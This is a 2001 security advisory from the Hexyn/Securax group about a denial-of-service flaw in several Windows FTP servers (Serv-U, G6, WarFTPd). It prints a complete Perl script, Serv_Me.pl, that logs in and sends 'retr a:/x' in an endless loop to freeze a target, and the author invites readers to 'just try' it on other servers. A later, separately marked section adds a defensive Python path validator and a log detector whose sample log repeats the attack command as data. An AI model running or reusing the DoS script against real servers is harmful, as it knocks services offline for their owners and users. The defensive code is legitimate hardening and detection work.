Hexyn / Securax Advisory #19 - Multiple FTP Server DoS

Topic:      Multiple FTP Server DoS
Announced:  2001-02-17
Affects:    Serv-U FTP Server, G6 FTP Server, WarFTPd Server,...

DISCLAIMER:
***********
THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE
CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS
SUBJECT TO CHANGE WITHOUT PRIOR NOTICE. THIS ADVISORY HAS ONLY BEEN TESTED ON
WINDOWS 98 AND ONLY ON A SMALL COLLECTION OF TEST SERVERS, SO THE OFFERED
INFORMATION MAY NOT ALWAYS BE CORRECT.

I. Problem Description
**********************
There is a DoS attack in most of the FTP Servers available for Windows 9x/NT.
The bug is a consequence of the way Windows handles disk drives.

II. Impact
**********
When sending the command "retr a:/blah" (or "get a:/blah" in the default UNIX
FTP client), the server will freeze for about one second, and the CPU usage
will go through the roof.

Exploit:
--------
Available at: http://t-Omicr0n.hexyn.be/exploits.htm

III. Solution
*************
At this time, no patch is available yet.

IV. Credits
***********
Bug discovered by t-Omicr0n

Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr,
Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH,
zeroX, AreS, tips, Lacrima, GigaByte and everyone at #securax@irc.hexyn.be

-- t-Omicr0n @ http://t-Omicr0n.hexyn.be


#!/usr/bin/perl
#
# Serv_Me.pl - Remote FTP DoS'er
# ------------------------------
# "And in the end I will be free, by kissing you, or killing me."
# -- Mister Me.
#
# Tested on Serv-U FTP, G6 FTP and WarFTPd. Lots of other servers are vulnerable, just try.
# It DoSSeS by flooding the server with "retr a:/bla" commands.
# CPU usage during tests (in %): 2 2 3 13 100 100 100 100 ...
#
# Read "Hexyn / Securax Advisory #19 - Multiple FTP Server DoS" for more information
# @ http://t-Omicr0n.hexyn.be/advisories.htm
#
# I *hate* those flooding DoS'es, it's normal a server slows down when you flood the hell
# out of it, but this flood only sends 0.009 Kb/s and that's not even considered a flood,
# that's considered a drop of bytes every second.
# You can even DoS the server over a 1 KiloBit/s modem... :-)
#
# Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F,
# Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips,
# Lacrima, GigaByte and everyone at #securax@irc.hexyn.be
#
# WARNING: This *may* damage the server's floppy disk drive.

use IO::Socket;

sub initiate {
    if ($ARGV[0] eq '') {
        die "Usage: perl serv_me.pl <host> <port> <user> <pass>\nExample: perl serv_me.pl 127.0.0.1 21 anonymous me@\n";
    }
    $host = $ARGV[0];
    $port = $ARGV[1];
    $user = $ARGV[2];
    $pass = $ARGV[3];
};

sub connecttoserver {
    print("Connecting to host: $host\n");
    $socket = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
        Type     => SOCK_STREAM
    ) || die "Can't connect to $host";
    print "Socket Connected. Logging in...\n";
};

sub login {
    print "user $user\n";
    print $socket "user $user\r\n";
    $response = <$socket>;
    print "$response\n";
    print "pass $pass\n";
    print $socket "pass $pass\r\n";
    $response = <$socket>;
    print "$response\n";
    print "Logged in. Dossing now. Press CTRL-C to stop.\n";
};

sub doit {
    for (;;) {
        print "retr a:/x\n";
        print $socket "retr a:/x\r\n";
        $response = <$socket>;
        print "$response";
    }
}

initiate();
connecttoserver();
login();
doit();

# -- t-Omicr0n @ http://t-Omicr0n.hexyn.be
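The advisory's Problem Description and Solution sections leave the defender with two gaps: the root cause is an FTP path argument that reaches the Windows filesystem layer as a drive-letter path ("a:/blah"), and no vendor patch was available. The following is an added example, not code from the advisory or from any of the FTP servers it names. It shows (1) the path-argument check a Windows-hosted FTP server, or a filtering proxy in front of one, would apply before touching the filesystem, confining every argument to a virtual root and rejecting anything that names a physical drive, and (2) a detector run over constructed FTP control-channel log lines that counts such rejected arguments per client, so a tight "retr a:/x" loop like the one in the attached script stands out. It generalises beyond the advisory's a:/ case to any drive letter, UNC prefixes and the Windows reserved device names; the log line format, the IP addresses and the threshold are constructed for the example.

```python
"""Defender-side checks for the drive-letter FTP path pattern in Securax Advisory #19.

Assumptions (not from the advisory): the server exposes a virtual root "/",
control-channel logs look like "<date> <time> <client-ip> <CMD> [<arg>]",
and three or more rejected path arguments from one client is worth an alert.
"""
import re
from collections import Counter

# "a:/x", "A:\\blah", "d:" -- a DOS drive letter followed by a colon.
DRIVE_LETTER_RE = re.compile(r"^[A-Za-z]:[\\/]?")
# "\\server\share" or "//server/share" -- UNC paths reach other machines' shares.
UNC_RE = re.compile(r"^[\\/]{2}")
# Windows reserved device names; "NUL.txt" is still the NUL device, so only the
# part before the first dot is compared.
RESERVED_DEVICES = ({"CON", "PRN", "AUX", "NUL"}
                    | {f"COM{i}" for i in range(1, 10)}
                    | {f"LPT{i}" for i in range(1, 10)})

# Commands whose argument is a path; LIST/NLST may legitimately have no argument.
PATH_COMMANDS = {"RETR", "STOR", "APPE", "LIST", "NLST", "CWD", "SIZE", "MDTM",
                 "DELE", "RNFR", "RNTO", "STAT", "MKD", "RMD"}


def resolve_ftp_path(arg: str, cwd: str = "/") -> "str | None":
    """Return the canonical virtual path for ARG interpreted relative to CWD,
    or None if ARG must be rejected before the filesystem is consulted."""
    if not arg or "\x00" in arg:
        return None
    # The advisory's trigger: a physical drive named directly in the argument.
    if DRIVE_LETTER_RE.match(arg) or UNC_RE.match(arg):
        return None
    text = arg.replace("\\", "/")
    # Absolute arguments start from the virtual root, relative ones from CWD.
    base = [] if text.startswith("/") else [p for p in cwd.split("/") if p]
    for part in text.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not base:           # would climb above the virtual root
                return None
            base.pop()
            continue
        if part.split(".", 1)[0].upper() in RESERVED_DEVICES:
            return None
        base.append(part)
    return "/" + "/".join(base)


LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<client>\S+) (?P<cmd>[A-Za-z]{3,4})(?: (?P<arg>.*))?$")


def scan_control_log(lines, threshold: int = 3):
    """Count, per client, path-taking commands whose argument resolve_ftp_path()
    rejects. Returns (counts, offenders) where offenders met the threshold."""
    counts = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        cmd = m.group("cmd").upper()
        arg = m.group("arg") or ""
        if cmd in PATH_COMMANDS and arg and resolve_ftp_path(arg) is None:
            counts[m.group("client")] += 1
    offenders = sorted(c for c, n in counts.items() if n >= threshold)
    return counts, offenders


# Constructed sample log: one client looping on the advisory's command, one
# ordinary anonymous session, one single drive-letter probe.
SAMPLE_LOG = """\
2001-02-17 10:00:01 192.0.2.10 USER anonymous
2001-02-17 10:00:01 192.0.2.10 PASS me@
2001-02-17 10:00:02 192.0.2.10 RETR a:/x
2001-02-17 10:00:03 192.0.2.10 RETR a:/x
2001-02-17 10:00:04 192.0.2.10 RETR a:/x
2001-02-17 10:00:05 192.0.2.10 RETR a:/x
2001-02-17 10:00:07 198.51.100.7 USER ftp
2001-02-17 10:00:07 198.51.100.7 PASS guest@
2001-02-17 10:00:08 198.51.100.7 CWD /pub
2001-02-17 10:00:09 198.51.100.7 LIST
2001-02-17 10:00:10 198.51.100.7 RETR readme.txt
2001-02-17 10:00:12 203.0.113.5 RETR c:\\file.txt
""".splitlines()


if __name__ == "__main__":
    for probe in ("a:/x", "A:\\blah", "//srv/share/f", "pub/file.txt", "../../x"):
        print(f"{probe!r:20} -> {resolve_ftp_path(probe, '/pub')!r}")
    counts, offenders = scan_control_log(SAMPLE_LOG)
    print("rejected path arguments per client:", dict(counts))
    print("clients over threshold:", offenders)
```

The validator deliberately runs before any filesystem call: the advisory's symptom is the cost of the drive access itself, so a check that opens the path first and then decides is too late. The detector counts rejections per client rather than raw RETR volume because the script in this advisory sends only a few bytes per second, far below anything a bandwidth-based flood threshold would notice.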